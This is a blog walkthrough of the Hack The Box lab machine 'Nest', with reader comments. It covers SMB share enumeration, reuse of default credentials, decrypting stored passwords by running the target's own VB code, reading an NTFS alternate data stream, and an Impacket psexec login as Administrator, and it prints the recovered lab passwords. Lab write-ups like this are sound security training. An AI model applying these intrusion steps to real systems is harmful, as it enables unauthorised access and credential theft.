Hack The Box Nest Writeup – 10.10.10.178

Hack The Box Nest Writeup – 10.10.10.178

Hack the box Nest (IP: 10.10.10.178) is a new Windows-based machine recently released and owned like nothing. I believe most early users used the unintended method which confirmed by the author VBScrub himself. Some of the users even mentioned that they owned the system before they get the user flag.

However, from Discord, I come to know that the unintended way to own the box is using Metasploit is not working anymore, as the guys at HTB has patched the machine.

Last week I was a bit occupied at work so, I had no time to work on the recent Linux machine Patents. I tried a couple of times last weekend but seemed quite hard, hence I decided to discard it for a while and decided to start with the Nest windows machine that released after Patents. To be honest, after 17-18 years of working in the only Windows environment, I’m more comfortable with Windows than Linux.

Reconnaissance

I recently got to know about a tool called AutoRecon. A nice tool that performs automated enumeration of services of any given IP. This actually gives a nice report in a text format with properly categorized results in the different directories.

Before letting AutoRecon to the task, I used our good old friend nmap to initiate the scan. The scan result shows two open ports (SMB 2: 445 and port 4386).

# root @ ns09 in ~/htb/nest [10:21:34] 
$ nmap -sS -sV -oA nmap.txt -Pn -sC 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 10:23 +03
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?
4386/tcp open ?
Host script results:
|_clock-skew: 1m19s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T07:25:19
|_  start_date: 2020-01-27T07:13:35
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.06 seconds

In the next step, I used AutoRecon and here are the results:

# root @ ns09 in /AutoRecon on git:master x [10:47:55] C:148
-------//SNIP//----------
[*] Running task tcp/445/sslscan on 10.10.10.178 with if [ "False" == "True" ]; then sslscan --show-certificate --no-colour 10.10.10.178:445 2>&1 | tee "/AutoRecon/results/10.10.10.178/scans/tcp_445_sslscan.txt"; fi
[*] Running task tcp/445/nmap-smb on 10.10.10.178 with nmap -vv --reason -Pn -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="unsafe=1" -oN "/AutoRecon/results/10.10.10.178/scans/tcp_445_smb_nmap.txt" -oX "/AutoRecon/results/10.10.10.178/scans/xml/tcp_445_smb_nmap.xml" 10.10.10.178
[*] Running task tcp/445/enum4linux on 10.10.10.178 with enum4linux -a -M -l -d 10.10.10.178 2>&1 | tee "/AutoRecon/results/10.10.10.178/scans/enum4linux.txt"
[*] Running task tcp/445/smbclient on 10.10.10.178 with smbclient -L\\ -N -I 10.10.10.178 2>&1 | tee "/AutoRecon/results/10.10.10.178/scans/smbclient.txt"
[*] Running task tcp/445/smbmap-share-permissions on 10.10.10.178 with smbmap -H 10.10.10.178 -P 445 2>&1 | tee -a "/AutoRecon/results/10.10.10.178/scans/smbmap-share-permissions.txt"; smbmap -u null -p "" -H 10.10.10.178 -P 445 2>&1 | tee -a "/AutoRecon/results/10.10.10.178/scans/smbmap-share-permissions.txt"
-------//SNIP//----------
[*] Task tcp/445/sslscan on 10.10.10.178 finished successfully in less than a second
[*] Task tcp/445/smbclient on 10.10.10.178 finished successfully in 2 seconds
[*] Task tcp/445/smbmap-execute-command on 10.10.10.178 finished successfully in 5 seconds
[*] Task tcp/445/smbmap-share-permissions on 10.10.10.178 finished successfully in 13 seconds
[*] Task tcp/445/smbmap-list-contents on 10.10.10.178 finished successfully in 32 seconds
-------//SNIP//----------
[*] [10:55:02] - There are 2 tasks still running on 10.10.10.178: nmap-full-tcp, nmap-top-20-udp
[*] [10:56:02] - There are 2 tasks still running on 10.10.10.178: nmap-full-tcp, nmap-top-20-udp
[*] [10:57:02] - There are 2 tasks still running on 10.10.10.178: nmap-full-tcp, nmap-top-20-udp
[*] Service detection nmap-top-20-udp on 10.10.10.178 finished successfully in 9 minutes, 6 seconds
[*] [10:58:02] - There is 1 task still running on 10.10.10.178: nmap-full-tcp
[*] Service detection nmap-full-tcp on 10.10.10.178 finished successfully in 17 minutes, 40 seconds
[*] Found unknown on tcp/4386 on target 10.10.10.178
[*] Running task tcp/4386/sslscan on 10.10.10.178 with if [ "False" == "True" ]; then sslscan --show-certificate --no-colour 10.10.10.178:4386 2>&1 | tee "/AutoRecon/results/10.10.10.178/scans/tcp_4386_sslscan.txt"; fi
[*] Task tcp/4386/sslscan on 10.10.10.178 finished successfully in less than a second

The tool actually automated all the recon process, it ran SMBClient command and listed.

[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.178...
[+] IP: 10.10.10.178:445	Name: nest.htb                                          
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445	Name: nest.htb                                          
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	Data                                              	READ ONLY
	.\
-------//SNIP//----------
	dr--r--r--                0 Wed Aug  7 22:08:07 2019	..
	dr--r--r--                0 Wed Aug  7 22:08:10 2019	HR
	dr--r--r--                0 Wed Aug  7 22:08:07 2019	Marketing
	.\\Shared\Templates\HR\
	dr--r--r--                0 Wed Aug  7 22:08:10 2019	.
	dr--r--r--                0 Wed Aug  7 22:08:10 2019	..
	-r--r--r--              425 Thu Aug  8 01:55:36 2019	Welcome Email.txt
	IPC$                                              	NO ACCESS
	Secure$                                           	NO ACCESS
	Users                                             	READ ONLY
	.\
	dr--r--r--                0 Sun Jan 26 02:04:21 2020	.
	dr--r--r--                0 Sun Jan 26 02:04:21 2020	..
-------//SNIP//----------
	dr--r--r--                0 Thu Aug  8 20:02:56 2019	R.Thompson
	dr--r--r--                0 Thu Aug  8 01:56:02 2019	TempUser

I found a lot of SMB share, in one of the shares, there is a Welcome Email.txt file that seemed to be an email template HR used to send to the newly joined employees. The Template has a default username and password, tempuser:welcome2019

Since I have a default user’s credentials, I started to enum the box, I found an interesting XML config file inside \IT\Configs\RU Scanner\. The file actually had credentials of a user C.Smith in an encrypted format.

c.smith:fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=

smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \IT\Configs\RU Scanner\> 

I spent a few minutes to decrypt the password using online tools, but nothing helped me, so I decided to spend time on the machine instead. I spent some time on the machine, as I was hinted to find helpful files inside the data/IT/Carl/VB Projects folder, so I did.

The folder NotepadPlusPlus contains two XML files. One of those is config.xml has a code snippet at the end of the file that lists the user’s file access history. The list shows that the TempUser had accessed a file called “Temp.txt” from the shared folder of another user “Carl”. When I tried to list the directories inside the IT folder, I was denied permission, however, I was able to list the contents of Carl directly.

# root @ ns09 in ~/htb/nest [13:15:53] 
$ smbclient //10.10.10.178/Secure$ -U TempUser         
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 02:08:12 2019
  ..                                  D        0  Thu Aug  8 02:08:12 2019
  Finance                             D        0  Wed Aug  7 22:40:13 2019
  HR                                  D        0  Thu Aug  8 02:08:11 2019
  IT                                  D        0  Thu Aug  8 13:59:25 2019
cd 
		10485247 blocks of size 4096. 6449680 blocks available
smb: \> cd IT
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 22:42:14 2019
  ..                                  D        0  Wed Aug  7 22:42:14 2019
  Docs                                D        0  Wed Aug  7 22:44:00 2019
  Reports                             D        0  Tue Aug  6 16:45:40 2019
  VB Projects                         D        0  Tue Aug  6 17:41:55 2019

		10485247 blocks of size 4096. 6449680 blocks available
smb: \IT\Carl\>

Getting User

Since the machine is too buggy at this point, I decided to download the whole “VB Projects” folder to my machine and find out the hint. The VB project folder contains two subdirectories, Production, and WIP. The WIP contains a Visual basic project called “RUSScanner”. I copied the whole folder to my Windows host machine and open the project using MS Visual Studio.

While going through the code I noticed this program is a decrypter and possibly I will be able to decrypt the password of C.Smith I found earlier.

When I debug the project, I had the below error. There is a config file that needs to be loaded first, I couldn’t find the config file, so I disabled it and from the main module, and I add the username and password I found.

My edited main function in the Module1 looks like below. After modifying the code I added a breakpoint at End Sub so the debug stops at this breakpoint and I have the password decrypted.

Module Module1
    Sub Main()
        'Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = "C.Smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub
End Module

I now have the password of user C.Smith:xRxRxPANCAK3SxRxRx.

# root @ ns09 in ~/htb/nest [17:58:17] 
$ smbclient //10.10.10.178/Users -U C.Smith
Enter WORKGROUP\C.Smith's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 02:04:21 2020
  ..                                  D        0  Sun Jan 26 02:04:21 2020
  Administrator                       D        0  Fri Aug  9 18:08:23 2019
  C.Smith                             D        0  Sun Jan 26 10:21:44 2020
  L.Frost                             D        0  Thu Aug  8 20:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 20:02:50 2019
  TempUser                            D        0  Thu Aug  8 01:55:56 2019

		10485247 blocks of size 4096. 6449681 blocks available
smb: \> cd "C.Smith"
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 10:21:44 2020
  ..                                  D        0  Sun Jan 26 10:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 02:06:17 2019
  user.txt                            A       32  Fri Aug  9 02:05:24 2019

		10485247 blocks of size 4096. 6449681 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\> ^Z
[9]  + 5013 suspended  smbclient //10.10.10.178/Users -U C.Smith

# root @ ns09 in ~/htb/nest [18:00:09] C:148
$ cat user.txt
cf71[-----------]6e987#                                                                                                                                                                                  
# root @ ns09 in ~/htb/nest [18:00:14] 

Rooting Process

The user C.Smith has a directory called “HQK Reporting”, inside there are a couple of files and a folder that seemed interesting, let us download.

Alternate Data Streams (ADS):

The file “Debug Mode Password.txt” inside the HQK Reporting is an example of Windows Alternate Data Stream file attributes. In the ADS the content actually inside the $Data is always empty. If you notice the file ” Debug Mode Password.txt ” is actually a “0” size file, but the file contains the password for Debug Mode.

To open/ read the file, the file needs to be downloaded directly from Windows, if you download the file from your *nix machine, you will lose the content and the file becomes unworthy.

I used Windows drive-map feature to map the drive (//10.10.10.178/Users/C.Smith/) and directly download the file to my host machine. The below PowerShell command -Stream * will show the hidden stream name. The PowerShell command revealed the Stream name as “Password” In the next command use “type” to read the actual password. In our case, the password is: WBQ201953D8w

Get-Item -path "C:\Users\[me]\Desktop\ADS\Debug Mode password.txt" -stream *

I used telnet to connect the machine on the second port (4386) we discovered in the initial port scan. After connecting to telnet I used to debug password to enable debug mode.

# root @ ns09 in ~/htb/nest [22:52:45] 
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>

I noticed the LDAP directory and set it as my current directory. After listing the contents of the directory I noticed 2 files: [1] HqkLdap.exe and [2] Ldap.conf. I used the SHOWQUERY command to read the LDAP.conf file. Here we have the Administrator’s encrypted credentials. Another hurdle.

Compiling the binary

The Administrator password can be decrypted using the binary file inside the user C.Smith’s directory. This binary file can be download to your Windows machine using the Windows network drive mapping feature or from the “net view” command from the command prompt.

I download the file using the drive map to a folder on my desktop. The binary file can be compiled using any binary compiler.

I open the file using my debugger and start analyzing MainModule(). The two warning messages in below screenshot caught my eyes:

To run the binary we need 2 main things, else the binary will fail. We need a config file and a file called “HqDbImport.exe”. Config file was inside the LDAP directory, this can be easily copied to notepad and I can make a duplicate one. But, I couldn’t find the HqDbIport.exe, I checked the arguments of the binary files but I didn’t find anywhere this file was called after the MainModule. So I decided to make a duplicate copy of HqkLdap.exe and renamed it as HqDbImport.exe and placed it in a separate folder. I made a .config file using the content below.

Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1]   HqkLdap.exe
[2]   Ldap.conf
Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

So, now I have 3 files inside the new folder ready to be run to decrypt the Administrator password:

After running the binary from command prompt I got the Administrator password decrypted immediately.

Administrator:XtH4nkS4Pl4y1nGX

Now, I’m at the last step before getting into the root of the system. I use Impacket/PSExec to login to the system.


# root @ ns09 in ~/htb/nest [11:45:27] 
$ python psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file cKuDuUwE.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service BaWW on 10.10.10.178.....
[*] Starting service BaWW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd /

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 2C6F-6A14

 Directory of C:\Users\Administrator\Desktop

01/26/2020  07:20 AM    <DIR>          .
01/26/2020  07:20 AM    <DIR>          ..
08/05/2019  10:27 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  26,407,510,016 bytes free

C:\Users\Administrator\Desktop>type root.txt
6594[-----------------]78c41
C:\Users\Administrator\Desktop>

That’s it, thank you for reading. I have skipped a couple of steps as I forgot to take screenshots, those are just straight forward binary reverse which you can do it using any compiler. Edit method and recompile.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
15 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Akashsky
Akashsky
8 months ago

One more fast way to ADS file directly from smb
~$ allinfo
it will list all data stream content.
in this case “Debug Mode Password.txt::Password:”$DATA
just remove the “:”
~$ get “Debug Mode Password.txt:Password:$DATA”
you will directly get the contents.

domedfd
8 months ago

which debugger do you recommend using to open the HqkLdap.exe file?

Domenico Delvalle
Domenico Delvalle
Reply to  Navin
8 months ago

Wow! that great!
It is very good dspy! Tanks 🙂
one more question
What compiler to use to compile in .exe? I tried to execute the command “HqkLdap.exe Ldap.conf” with the three files but it did not bring me the password, is that why we need to compile? I saw in your screenshot that your file has the name HqkLdap2.exe and also that it has a smaller size.

cyb3reagle
cyb3reagle
Reply to  domedfd
8 months ago

on Linux u can use ISLpy.

ceracas
8 months ago

HI Bro, whats prompts you to copy the exe file and name it HQKDbimport.exe ? only asking if we have the same idea why, thanks

trackback
8 months ago

[…] Hack The Box Nest Writeup – 10.10.10.178 […]

Arsenio Aguirre
Arsenio Aguirre
7 months ago

Hi, I have tested nmap to discovery open ports and it just shows 445. I dont know why it just shows a port.

Arsenio Aguirre
Arsenio Aguirre
7 months ago

For Mac, what.debugger can I use?

cyruslab
6 months ago

Hi, I just got the root of nest. For the root, the hardest was the ntfs alternate stream, I notice it when i did the allinfo in the smb shares, I downloaded the 0 byte file before but i remove it thinking that it was empty. I read the file with more by putting a colon and add the name of the stream and i got the password for debug, after that getting to root was easy; though I did the entire thing through smbclient by login as administrator, at first i went to the user share and downloaded a… Read more »

cyruslab
6 months ago

I am using ILspy for .net decompiler which can be run on my kali linux hence I do not require Win10 VM for doing dnSpy any more.

Sorry, that action is blocked.